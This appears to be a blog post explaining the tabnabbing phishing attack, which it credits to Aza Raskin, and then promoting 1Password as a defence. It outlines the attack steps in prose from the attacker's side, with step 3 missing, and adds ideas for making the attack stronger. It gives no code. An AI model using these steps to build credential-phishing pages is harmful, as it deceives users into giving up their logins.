Tabnabbing is a computer Exploit and Phishing attack, which persuades users to submit their Login details and Password to popular Websites by impersonating those sites and convincing the user that the site is genuine. The attack's name was given in early 2010 by Aza Raskin, a security researcher and design expert. The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded.
The steps in detail:
1. A user navigates to your normal looking site.
2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.
Aza also notes the attack could get a lot more potent if they (a) used the CSS history exploit to discover which sites the user has visited; (b) employed certain other techniques, like timing attacks, to determine which services a user is currently logged into.
What should you do to protect yourself? Well, it’s suggested by Aza thinks you should use Firefox, which has an Account Manager feature that is supposed to help protect you from this kind of attack. But what about the next phishing attack? Or what if you prefer a different browser? Read on for a better solution that will allow you to use just about any browser you choose.
To protect yourself against Tabnabbing, 1Password.if you have not really heard of 1Password; it will be a great opportunity to check it out. 1Paaword does not only creates a sure and strong password for you, but also manage your login information’s and also fill in forms automatically without you always have to type them in which makes it secure from credential harvesting and also save you a lot of time. NB: 1Password ONLY remembers or fills in form u saved login information’s for. 1Password won't be looked over the way the human eye can be. For instance, if you save your login information in a site such as Gmail in 1password, and another website manages to trick you into thinking that it is Gmail, it won't be fooled or tricked by 1Password. One cool feature about 1password I love most is the Fill and Submit, let’s say Maybe you'll close a tab that you were about to type in your login information’s or let 1password do the filling and accidently, you closed it and re-open a new one; 1Password's awesome "Fill and Submit" feature which will pull up the proper site and automatically log you in. What you almost certainly will not do is blindly type your username and password in, because 1Password makes it so easy to do it securely. Not that 1Password costs $40, but also has a 30 days evaluation; it also has an iPhone and IPad App. 1Password even lets you sync your password data via Dropbox.